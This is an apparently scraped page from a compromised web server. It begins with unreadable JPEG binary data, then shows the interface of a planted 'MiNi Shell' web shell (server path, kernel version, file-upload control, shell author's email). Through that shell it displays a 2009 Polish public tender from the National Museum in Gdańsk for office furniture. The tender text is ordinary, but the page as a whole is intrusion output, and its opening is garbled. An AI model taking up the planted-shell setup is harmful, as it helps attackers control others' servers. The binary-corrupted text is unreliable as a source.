JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090929/165373-N-2009.html

<p class="kh_header"><b>Gdańsk: Dostawa fabrycznie nowych zestawów stałego wyposażenia, zgodnego z wymogami ergonomii stanowiska pracy i przepisami BHP do remontowanych pomieszczeń biurowych Muzeum Narodowego w Gdańsku</b><br>
<b>Numer ogłoszenia: 165373 - 2009; data zamieszczenia: 29.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Narodowe w Gdańsku , ul. Toruńska 1, 80-822 Gdańsk, woj. pomorskie, tel. 058 301 70 61, faks (058) 301 11 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.narodowe.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa fabrycznie nowych zestawów stałego wyposażenia, zgodnego z wymogami ergonomii stanowiska pracy i przepisami BHP do remontowanych pomieszczeń biurowych Muzeum Narodowego w Gdańsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa wraz z montażem stałego wyposażenia, zgodnego z wymogami ergonomii stanowiska pracy i przepisami BHP do remontowanych pomieszczeń biurowych Muzeum  Szczegółowy wykaz w tabeli, szczegółowy opis wymagań technicznych załącznik nr 2 do SIWZ
FORMULARZ CENOWY ELEMENTÓW WCHODZĄCYCH W SKŁAD OFERTY 



Lp.	Nazwa	Cena 1 szt.	Ilość 	Cena łącznie
1	KRZESŁO KOMPUTEROWE BIUROWE OBROTOWE		39	
2	BIURKO PRACOWNICZE KOMPUTEROWE W KSZTAŁCIE LITERY L		34	
3	WÓZEK NA KOMPUTER STACJONARNY		31	
4	KONTENER MOBLINY NISKI 1		24	
5	KONTENER MOBLINY NISKI 2		1	
6	KONTENER MOBLINY WYSOKI		10	
7	SZAFA NA AKTA		23	
8	SZAFA NA AKTA NISKA		2	
9	REGAŁ WYSOKI NA SEGEGATORY		23	
10	SZAFA UBRANIOWA		12	
11	SZAFKA Z DRZWIAMI PRZESUWNYMI		14	
12	PRZEGRODY PŁYTOWE		10	
13	STÓŁ KONFERENCYJNY		1	
14	KRZESŁO KONFERENCYJNE		10	
                                                                        



 


Załącznik nr 2
do Specyfikacji Istotnych
 Warunków Zamówienia

Szczegółowe wymagania techniczne
Zamawiany sprzęt stanowi pierwsze stałe wyposażenie remontowanych pomieszczeń zaplecza biurowo-administracyjnego MNG

UWAGI OGÓLNE:
Jeżeli szczegółowy opis nie stanowi inaczej, należy przyjąć, że dla wszystkich elementów objętych zamówieniem publicznym:
płyty wiórowe laminowane lub melaminowane posiadają następujące parametry- klasa E-1 , kolor jasny - brzoza, wykończone obrzeżem z PCV w kolorze dopasowanym do koloru laminatu o grubości 2 mm. Wszystkie uchwyty wykonane są z metalu i pochodzą z tej samej kolekcji, kształt łuku, mocowanie dwupunktowe. Kolor mebli- brzoza, jest wskazaniem referencyjnym, laminat melamina mają być jasne z wzorem drewna. Kolor metalu- dopuszczalne są odcienie metalu srebrnego (aluminium, chrom itp.). Wszystkie elementy metalowe, które są widoczne muszą być w jednym kolorze. Nie dopuszcza się wykończeń powszechnie uznawanych jako przemysłowe np. ocynk. Szuflady wykonane są z płyty wiórowej laminowanej lub melaminowanej o grubości 12 mm, front o grubości 18 mm, dno z płyty HDF o grubości 2,5 mm, prowadzone na prowadnicach rolkowych wykonanych z metalu.   
Wszystkie wymiary podane w wymaganiach technicznych przyjęto jako standardowe dla mebli biurowych. Dopuszcza się odchylenie 2% od podanych wymiarów, pod warunkiem, że nie wpłynie to na spójność systemu, oraz meble o wymiarach różnych od podanych w wymaganiach technicznych, a mieszczących się w podanym przedziale są w standardowej ofercie wykonawcy. W takim przypadku, do oferty należy załączyć dane dotyczące wymiarów i potwierdzenie, że jest to standardowy mebel np. katalog.   

1.	KRZESŁO KOMPUTEROWE, BIUROWE, OBROTOWE - krzesło z regulowanymi podłokietnikami z tworzywa w kolorze czarnym , stelaż krzesła - tworzywo w kolorze czarnym lub metalik, mechanizm synchroniczny, kółka do twardej powierzchni (z nakładkami) 5 sztuk, oparcie regulowane- regulacja wysokości- minimum 5 pozycji, regulacja nachylenia kąta oparcia- minimum 4 pozycje, regulowana siła nacisku oparcia, siedzisko wykonane z sklejki drzewa liściastego, wyściełane integralną pianką PU o gęstości 60 kg/m3, tapicerka siedziska i oparcia wykonana z poliestru 100% - kolor grafitowy o następujących parametrach:
     - atest odporności na ścieranie minimum 100 000 cykli
     - odporność na piling 5 minimum wg EN ISO 12945-2
     -trudnozapalność na zapałkę EN 1021 - 2
     - trudnozapalność na papierosa EN 1021 - 1 

2.	BIURKO PRACOWNICZE, KOMPUTEROWE W KSZTAŁCIE LITERY L -o wymiarach 160/80x120/60, z regulacją wysokości w 68-80cm, na stelażu z nogami metalowymi w kolorze metalu, blat wykonany z płyty wiórowej laminowanej klasy E-1 grubości 25 mm, kolor jasny - brzoza, wykończonej obrzeżem z PCV w kolorze dopasowanym do koloru laminatu o grubości 2 mm, oraz przepustem kablowym z tworzywa w kolorze dopasowanym do koloru laminatu. Biurko musi posiadać rozwiązanie do ukrycia kabli. Do biurka przymocowana jest blenda o wymiarach 160x35 cm wykonana z tego samego materiału co blat. W części krótszej biurka pod blatem umieszczona jest szuflada pod klawiaturę wykonana z tworzywa sztucznego i zamocowana na 2 prowadnicach kulkowych wykonanych z metalu z kątownikami do podwieszania pod blatem. Stelaż połączony z blatem przy zastosowaniu mufek metalowych.
3.	WÓZEK NA KOMPUTER STACJONARNY- o wymiarach 23x50x9cm, wykonany z blachy o grubości 2 mm na 4 kółkach w tym 2 kółka z hamulcem.
4.	KONTENER MOBLINY NISKI 1- o wymiarach 42x60x55 cm składający się z 3 szuflad: w tym 1 szuflady, 1 szuflady wyposażonej w piórnik z tworzywa sztucznego, 1 szuflady na teczki zawieszkowe, wykonany z materiału i kolorze identycznym jak  BIURKO PRACOWNICZE KOMPUTEROWE W KSZTAŁCIE LITERY L z punktu 2. Wieniec dolny i górny płyta o grubości 18 mm, korpus i fronty szuflad płyta o grubości 18 mm. Kontener na 4 kółkach- 2 kółka wyposażone w hamulec. Rączki wykonane z metalu, identyczne z kolorem nóg i wszystkimi pozostałymi uchwytami mebli objętych tym postępowaniem o zamówienie publiczne.
5.	KONTENER MOBLINY NISKI 2- o wymiarach 42x60x55 cm składający się z 1 szuflady, 1 półki płytowej o grubości 18 mm,  wykonany z materiału i kolorze identycznym jak  BIURKO PRACOWNICZE KOMPUTEROWE W KSZTAŁCIE LITERY L z punktu 2. Wieniec dolny i górny płyta o grubości 18 mm, korpus i fronty szuflad płyta o grubości 18 mm. Kontener na 4 kółkach- 2 kółka wyposażone w hamulec. Rączki wykonane z metalu, identyczne z kolorem nóg i wszystkimi pozostałymi uchwytami mebli objętych tym postępowaniem o zamówienie publiczne.
6.	KONTENER MOBLINY WYSOKI- o wymiarach 43x80x74 cm składający się z 4 szuflad w tym: 2 szuflad zwykłych, 1 szuflady wyposażonej w piórnik z tworzywa sztucznego, 1 szuflady na teczki zawieszkowe, wykonany z materiału i kolorze identycznym jak  BIURKO PRACOWNICZE KOMPUTEROWE W KSZTAŁCIE LITERY L z punktu 2. Wieniec dolny i górny płyta o grubości 18 mm, korpus i fronty szuflad płyta o grubości 18 mm. Rączki wykonane z metalu, identyczne z kolorem nóg i wszystkimi pozostałymi uchwytami mebli objętych tym postępowaniem o zamówienie publiczne.
7.	SZAFA NA AKTA -  o wymiarach 80x42x183 cm wykonana z płyty wiórowej laminowanej o grubościach odpowiednio: wieniec górny i dolny 25 mm, korpus, drzwi, półki (4 szt.)18 mm. Plecy szafy wykonane z płyty HDF o grubości 2,5 mm w kolorze mebla wpuszczone we frezowane ściany boczne. Wszystkie krawędzie widoczne wykończone obrzeżem z PCV w kolorze dopasowanym do koloru laminatu o grubości 2 mm. Drzwi- 2 skrzydła wyposażone w zamki z 3 punktowym ryglowaniem. Szafa wyposażona w regulatory wysokości umożliwiające poziomowanie od wewnątrz. Uchwyty metalowe identyczne z kolorem nóg i wszystkimi pozostałymi uchwytami mebli objętych tym postępowaniem o zamówienie publiczne
8.	SZAFA NISKA - o wymiarach 80x42x72 cm wykonana z płyty wiórowej laminowanej o grubościach odpowiednio: wieniec górny i dolny 25 mm, korpus, drzwi, półka (1 szt.)18 mm. Plecy szafy wykonane z płyty HDF o grubości 2,5 mm w kolorze mebla wpuszczone we frezowane ściany boczne. Wszystkie krawędzie widoczne wykończone obrzeżem z PCV w kolorze dopasowanym do koloru laminatu o grubości 2 mm. Drzwi- 2 skrzydła wyposażone w zamki z 3 punktowym ryglowaniem. Szafa wyposażona w regulatory wysokości umożliwiające poziomowanie od wewnątrz.
9.	REGAŁ WYSOKI NA SEGEGATORY- o wymiarach 80x42x183 cm wykonany z płyty wiórowej laminowanej o grubościach odpowiednio: wieniec górny i dolny 25 mm, korpus i półki (4 szt.)18 mm. Plecy regału wykonane z płyty HDF o grubości 2,5 mm w kolorze mebla, wpuszczone we frezowane ściany boczne. Wszystkie krawędzie widoczne wykończone obrzeżem z PCV w kolorze dopasowanym do koloru laminatu o grubości 2 mm. Regał wyposażony w regulatory wysokości umożliwiające poziomowanie od wewnątrz.
10.	SZAFA UBRANIOWA- o wymiarach 80x42x183 cm wykonana z płyty wiórowej laminowanej o grubościach odpowiednio: wieniec górny i dolny 25 mm, korpus, drzwi, górna półka (1 szt.) 18 mm. Wyposażona w wieszak wysuwany. Plecy szafy wykonane z płyty HDF o grubości 2,5 mm w kolorze mebla wpuszczone we frezowane ściany boczne. Wszystkie krawędzie widoczne wykończone obrzeżem z PCV w kolorze dopasowanym do koloru laminatu o grubości 2 mm.  Drzwi- 2 skrzydła wyposażone w zamki z 3 punktowym ryglowaniem. Szafa wyposażona w regulatory wysokości umożliwiające poziomowanie od wewnątrz. Uchwyty metalowe identyczne z kolorem nóg i wszystkimi pozostałymi uchwytami mebli objętych tym postępowaniem o zamówienie publiczne.
11.	SZAFKA Z DRZWIAMI PRZESUWNYMI-o wymiarach 80x42x74 cm wykonana z płyty wiórowej laminowanej o grubościach odpowiednio: wieniec górny i dolny 25 mm, korpus, drzwi, półka (1 szt.) 18 mm. Plecy szafki wykonane z płyty HDF o grubości 2,5 mm w kolorze mebla wpuszczone we frezowane ściany boczne. Wszystkie krawędzie widoczne wykończone obrzeżem z PCV w kolorze dopasowanym do koloru laminatu o grubości 2 mm. Drzwi- 2 szt wyposażone w zamek zapadkowy.
12.	PRZEGRODY PŁYTOWE - na biurka o wymiarach 160x55 cm wykonana z płyty wiórowej laminowanej o grubości 18 mm montowane pod blatem biurka za pomocą kątowników.
13.	STÓŁ KONFERENCYJNY - o wymiarach 160x180 cm , blat wykonany z płyty wiórowej laminowanej o grubości 25 mm, krawędzie  wykończone obrzeżem z PCV w kolorze dopasowanym do koloru laminatu o grubości 2 mm. Blat połączony z metalowym stelażem trawersowym przy użyciu mufek metalowych, nogi na kółkach do powierzchni twardych z możliwością regulacji wysokości w zakresie minimum 10 cm, przynajmniej 2 z 4 kółek wyposażone w hamulec , wysokość stołu - dolny zakres maksimum 70 cm, górny zakres minimum 80 cm. Stół wyposażony w elementy umożliwiające łączenie z kolejnym stołem, oraz umożliwiający zmianę kąta blatu (do składowania).
14.	KRZESŁO KONFERENCYJNE- na stelażu metalowym, malowanym proszkowo, oparcie siatka, siedzisko tapicerowane miękkie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.15.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do postępowania obowiązany jest do wniesienia wadium w wysokości  1.000zł (słownie: osiem tysiąc złotych 00/100).
2. Wadium będzie wniesione w pieniądzu; poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych; gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U z 2007. Nr 42, poz. 275., z późn. zm. )
 3. Wadium wnoszone w pieniądzu należy przelać na rachunek Muzeum Narodowego w Gdańsku, ul. Toruńska 1,  80-822 Gdańsk, w Banku Millenium nr 42 1160 2202 0000 0000 6412 1898, przed upływem terminu składania ofert, z podaniem tytułu wadium - przetarg na dostawę i montaż  stałego wyposażenia  dla Muzeum Narodowego w Gdańsku. Datą wniesienia wadium jest data uznania rachunku zamawiającego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków: 1.1 posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 1.2 posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tzn. wykonawca w okresie ostatnich 3 lat od dnia wszczęcia postępowania o udzielenie zamówienia publicznego  wykaże się realizacją co najmniej 2 zadań dostawy i montażu mebli biurowych o wartości co najmniej 50 000 zł netto każda (dostawa objęta jedną umową), a wraz z jedną z tych dostaw dokonano regulacji mebli w okresie eksploatacji, co zostało potwierdzone stosownymi referencjami.
1.3 nie podlegający wykluczeniu z postępowania o udzielenie zamówienia. 2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy: 2.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4. 2.2 podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych. 2.3 wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji. 2.4 złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania.  2.5 nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.
2.6 nie zgodzili się na przedłużenie okresu związania ofertą  3. Zamawiający odrzuca ofertę jeżeli: 3.1 jest niezgodną z ustawą 3.2 jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych. 3.3 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji  3.4 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,   3.5 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia. 3.6 zawiera błędy w obliczeniu ceny  3.7 Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych  3.8 jest nieważna na podstawie odrębnych przepisów,  4. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą 5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki: A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę  A.2)  Wzór umowy   - parafowany przez wykonawcę 
A.3) Opis parametrów technicznych lub użytkowych dla każdego z oferowanych produktów wraz z ich dokumentacją zdjęciową lub graficzną umożliwiającą  zobrazowanie produktów, w celu ustalenia zgodności z opisem przedmiotu zamówienia oraz ich oceny. Wykonawca w dostarczonych opisach i na dokumentacji zdjęciowej lub graficznej musi stosować oznaczenia Zamawiającego (nr pozycji, nazwa z tabeli stanowiącą część oferty).
 B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty: B.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.   B.2) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.   B.3) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.    B.4) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych.    B.5) Koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym niniejszym zamówieniem publicznym.  C.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: 
C.1) Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych,  dostaw w okresie ostatnich trzech lat, przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością  dostawom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z dokumentami potwierdzającymi, że dostawy te zostały wykonane należycie.    C.2) Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Opis dokumentów stwierdzających posiadanie wymaganych uprawnień D. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej: D.1) Zamiast dokumentów, o których mowa w pkt. B.1), B.3), B.5) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: - nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. - nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. - nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.   - jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. D zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, 
- wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. D.    E. Dokumenty wymagane w przypadku składania oferty wspólnej:  E.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy, oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. B dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie    F. Postanowienia dotyczące składanych dokumentów F.1 Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem. F.2 Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.muzeum.narodowe.gda.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Narodowe w Gdańsku Toruńska 1 pok. 108
 80-822 Gdańsk.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.10.2009 godzina 10:00, miejsce: Muzeum Narodowe w Gdańsku Toruńska 1 pok. 108
 80-822 Gdańsk.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com